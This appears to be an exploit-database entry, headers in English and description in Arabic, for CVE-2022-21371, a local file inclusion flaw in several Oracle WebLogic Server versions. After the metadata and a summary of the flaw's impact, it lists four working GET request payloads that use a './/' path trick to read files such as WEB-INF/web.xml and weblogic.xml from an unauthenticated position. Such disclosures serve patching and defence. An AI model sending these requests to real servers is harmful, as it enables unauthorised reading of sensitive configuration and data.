
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 تضمين ملف محلي
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 تضمين الملفات المحلية
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371
ثغرة أمنية في منتج Oracle WebLogic Server من Oracle Fusion Middleware (المكوّن: Web Container). الإصدارات المدعومة المتأثرة هي 12.1.3.0.0 و 12.2.1.3.0 و 12.2.1.4.0 و 14.1.1.0.0. ثغرة قابلة للاستغلال بسهولة تسمح لمهاجم غير مصادق يمتلك وصولاً شبكياً عبر HTTP باختراق Oracle WebLogic Server. يمكن أن تؤدي الهجمات الناجحة على هذه الثغرة إلى وصول غير مصرح به إلى بيانات حرجة أو وصول كامل إلى جميع بيانات Oracle WebLogic Server التي يمكن الوصول إليها.
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml
من https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786